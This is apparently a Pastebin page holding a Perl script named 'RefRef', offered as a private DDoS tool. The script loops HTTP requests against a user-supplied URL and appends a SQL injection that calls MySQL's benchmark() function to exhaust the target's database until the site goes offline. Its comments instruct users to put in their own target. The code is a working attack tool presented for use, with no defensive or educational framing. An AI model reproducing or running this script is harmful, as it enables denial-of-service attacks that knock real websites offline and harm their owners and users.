Tophat

refref DDOS PRIVATE PERL Script in controversy to XerXes.

Aug 11th, 2012
1,758
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.44 KB | None | 0 0
  1.     #!usr/bin/perl
  2.     #RefRef (C) Anonymous 2011
  3.     #Private DDoS modified by CODED32
  4.     #Use wisely, modify the target below, replace with www.teamopenfire.com with target.
  5.     #Using target to Team OpenFire, will cause you personal problems, so better edit the script before use.
  6.      
  7.     use LWP::UserAgent;
  8.      
  9.     my $nave = LWP::UserAgent->new;
  10.     $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  11.     $nave->timeout(5);
  12.      
  13.     head();
  14.     if($ARGV[0]) {
  15.     now($ARGV[0]);
  16.     } else {
  17.     sintax();
  18.     }
  19.     copyright();
  20.      
  21.     sub now {
  22.     print "\n[+] Target : ".$_[0]."\n";
  23.     print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
  24.     while(true) {
  25.     $SIG{INT} = \&adios;
  26.     $code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
  27.     unless($code->is_success) {
  28.     print "[+] Web Off\n";
  29.     copyright();
  30.     }}}
  31.      
  32.     sub adios {
  33.     print "\n[+] Stoping attack\n";
  34.     copyright();
  35.     }
  36.      
  37.     sub head {
  38.     print "\n\n-- == #RefRef http://www.teamopenfire.com == --\n\n";
  39.     }
  40.      
  41.     sub copyright {
  42.     print "\n\n-- == RefRef http://www.teamopenfire.com == --\n\n";
  43.     exit(1);
  44.     }
  45.      
  46.     sub sintax {
  47.     print "\n[+] Sintax : $0 \n";
  48.     }
  49.      
  50.     sub toma {
  51.     return $nave->get($_[0]);
  52.     }
  53.      
  54.     # ¿ The End ?
Advertisement
Add Comment
Please, Sign In to add comment